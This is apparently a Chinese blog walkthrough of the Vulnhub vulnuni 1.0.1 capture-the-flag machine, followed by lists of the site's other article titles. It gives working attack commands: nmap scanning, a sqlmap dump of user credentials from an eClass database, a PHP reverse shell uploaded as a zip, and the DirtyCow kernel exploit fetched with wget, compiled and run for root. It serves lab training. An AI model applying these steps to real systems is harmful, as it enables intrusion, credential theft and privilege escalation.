Vulnhub:vulnuni1.0.1靶机
2024-10-21 03:18:22
kali:192.168.111.111
靶机:192.168.111.192
信息收集
端口扫描
nmap -A -v -sV -T5 -p- --script=http-enum 192.168.111.192
owasp-zap爬虫发现目录
漏洞利用
登录点存在sql注入,burp抓包保存成txt,用sqlmap利用,获得账号密码:admin|ilikecats89
sqlmap -o -r ./a.txt --batch --level 5 --risk 3 -D 'eclass' -T 'user' -C 'username,password' --dump
/vulnuni-eclass/modules/course_info/restore_course.php可以上传文件
把反弹shell的php脚本压缩成zip格式上传,上传后会自动解压到/vulnuni-eclass/courses/tmpUnzipping
提权
内核版本
dirtycow提权
searchsploit -p 40616
python开启http服务
python3 -m http.server
靶机下载
wget http://192.168.111.111:8000/40616.c
40616.c使用方法
gcc 40616.c -o exp -pthread
./exp
获得flag
最新文章
- Map工具系列-08-map控件查看器
- Event Store 2.0发布,带来了安全支持和测试版Projections库
- 在Linux下进行磁盘分区
- UINavigationController 与 UITabBarController
- SendMessage API
- [Immutable.js] Differences between the Immutable.js Map() and List()
- linux命令:scp
- hdu 3397 线段树双标记
- vue 增删改查
- spring中使用@PostConstruct和@PreConstruct注解
- python学习之-软件开发的目录规范
- RegExp.$1 简单理解
- iconfont 在项目中的简单使用
- Docker入门命令备份
- scrapy框架解读--深入理解爬虫原理
- Refactoring之——代码的坏味道(四)过长参数列
- 《Cracking the Coding Interview》——第18章:难题——题目7
- 关于audio.js的研究
- Myeclipse项目内容没有报错但是项目上面却有红色叉叉
- dwarf调试信息格式入门
热门文章
- day05-功能实现04
- 基于.NetCore开发博客项目 StarBlog - (24) 统一接口数据返回格式
- Vue element 自定义表单验证(验证手机号)
- 使用idea进行gitee代码管理
- C#开发的线程池和管理器 - 开源研究系列文章
- python连接kafka-2.0
- Ubuntu desktop 文件的书写格式
- 精华推荐 | 【JVM深层系列】「GC底层调优系列」一文带你彻底加强夯实底层原理之GC垃圾回收技术的分析指南(GC原理透析)
- AJAX容易出错地方,错误处理
- djiango路由匹配、djiango路由层、反向解析、有名无名反向解析